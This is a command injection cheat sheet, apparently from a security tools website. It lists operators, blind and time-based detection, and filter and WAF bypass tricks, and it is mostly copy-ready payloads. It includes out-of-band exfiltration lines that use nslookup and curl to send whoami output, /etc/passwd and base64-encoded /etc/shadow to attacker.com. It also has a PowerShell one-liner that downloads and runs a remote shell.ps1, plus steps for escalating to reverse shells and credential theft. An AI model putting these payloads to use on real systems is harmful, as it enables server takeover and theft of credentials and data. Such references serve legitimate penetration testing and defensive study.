Command Injection Cheat Sheet: Blind, Out-of-Band, and Filter Bypass (2025)

OS Command Injection lets attackers execute arbitrary system commands on the server. It's ranked in the OWASP Top 10 and remains one of the most dangerous vulnerability classes — a single exploitable endpoint can give an attacker complete control of the server. This cheat sheet covers every technique from basic detection to advanced blind and out-of-band exploitation.

Command Injection Operators

These metacharacters allow you to chain commands in both Linux and Windows:

# Works on both Linux and Windows
; (command separator — Linux only)
| (pipe — output of first command as input to second)
|| (OR — execute second if first fails)
& (background — execute both)
&& (AND — execute second only if first succeeds)

# Linux-specific
`command` (backtick substitution)
$(command) (dollar substitution)
$((command)) (arithmetic substitution)

# Newline
%0a (URL-encoded newline — works as command separator)

Basic Command Injection

When input is passed directly to a system command:

# If the application runs: ping -c 3 [user_input]
; id
| id
|| id
& id
&& id
`id`
$(id)
%0aid

Blind Command Injection

When you don't see the command output in the response, you need alternative detection methods:

Time-Based Detection

# Linux
; sleep 5
| sleep 5
& sleep 5
`sleep 5`
$(sleep 5)

# Windows
& ping -n 6 127.0.0.1 &
| ping -n 6 127.0.0.1
& timeout /t 5 &

If the response is delayed by ~5 seconds, you've confirmed blind command injection.

DNS-Based Detection (Out-of-Band)

# Linux — trigger DNS lookup to your server
; nslookup attacker.com
; dig attacker.com
; host attacker.com
`nslookup attacker.com`
$(dig attacker.com)

# Windows
& nslookup attacker.com &

# With data exfiltration
; nslookup $(whoami).attacker.com
; dig $(hostname).attacker.com

Use a tool like Burp Collaborator, interactsh, or a custom DNS server to catch the lookup.

HTTP-Based OOB (Out-of-Band)

# Linux
; curl http://attacker.com/$(whoami)
; wget http://attacker.com/$(cat /etc/hostname)
$(curl http://attacker.com/?data=$(id|base64))

# Windows
& certutil -urlcache -split -f http://attacker.com/%USERNAME% &
& powershell -c "Invoke-WebRequest http://attacker.com/$env:USERNAME" &

File-Based Detection

# Write output to a web-accessible file
; id > /var/www/html/output.txt
; whoami > /var/www/html/output.txt

# Then access: http://target.com/output.txt

Data Exfiltration Techniques

DNS Exfiltration (Stealthy)

# Exfiltrate one line at a time via DNS subdomain
; for line in $(cat /etc/passwd | head -5); do nslookup $line.attacker.com; done

# Base64 encode to handle special characters
; nslookup $(cat /etc/passwd | base64 | head -c 60).attacker.com

HTTP Exfiltration

# POST entire file contents
; curl -X POST -d @/etc/passwd http://attacker.com/exfil

# Base64 encoded
; curl http://attacker.com/$(cat /etc/shadow | base64 -w0)

Filter Bypass Techniques

Space Bypass

# Linux — many alternatives to spaces
cat${IFS}/etc/passwd
cat$IFS/etc/passwd
{cat,/etc/passwd}
cat</etc/passwd
X=$'cat\x20/etc/passwd'&&$X

# Windows
type%PROGRAMFILES:~10,1%file.txt    (extract space from env var)
cmd/c"whoami"                        (no space needed)

Keyword Bypass

# String concatenation
c'a't /etc/passwd
c"a"t /etc/passwd
c\at /etc/passwd

# Variable insertion
w$()hoami
w$(x)hoami
who$@ami

# Reverse command
echo 'dmaohw' | rev

# Base64 bypass
echo d2hvYW1p | base64 -d | bash

# Hex bypass
echo -e '\x77\x68\x6f\x61\x6d\x69' | bash

Need encoded payloads? Use our Encoder/Decoder to quickly generate Base64, hex, and URL-encoded command strings.

Slash and Path Bypass

# Without forward slash
cat ${HOME:0:1}etc${HOME:0:1}passwd

# Using environment variables
cat $(echo L2V0Yy9wYXNzd2Q= | base64 -d)

# Globbing
cat /e?c/p?ss??
cat /e*c/p*d

Blacklist Bypass

# If 'cat' is blocked
tac /etc/passwd       (reverse cat)
nl /etc/passwd        (with line numbers)
head /etc/passwd
tail /etc/passwd
less /etc/passwd
more /etc/passwd
sort /etc/passwd
rev /etc/passwd | rev
xxd /etc/passwd

Windows-Specific Payloads

# Environment variable substring
%COMSPEC:~-7,1%     = c (from C:\WINDOWS\system32\cmd.exe)

# PowerShell obfuscation
powershell -enc [BASE64_ENCODED_COMMAND]
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"

# CMD tricks
set x=who&&set y=ami&&%x%%y%
cmd /V:ON /C "set cmd=whoami&&!cmd!"

Platform Detection

# Determine if target is Linux or Windows
; echo $((1+1))      -> 2 (Linux — bash arithmetic)
& set /a 1+1         -> 2 (Windows — cmd.exe)

# Linux confirmation
; uname -a
; cat /etc/os-release

# Windows confirmation
& ver
& systeminfo

Escalating Command Injection

1. Confirm with whoami/id — know what user you're running as
2. Upgrade to interactive shell — use our Reverse Shell Generator to get a proper shell
3. Enumerate the system — check for privilege escalation vectors
4. Exfiltrate sensitive data — database configs, API keys, credentials
5. Pivot internally — scan internal network, access cloud metadata via SSRF techniques

Generate command injection payloads with operator variations, encoding, and filter bypasses using our Command Injection Generator. Combine with the WAF Bypass Generator to evade web application firewalls.

For a complete payload reference, visit the Command Injection Cheat Sheet with 80+ copy-ready payloads organized by technique and platform.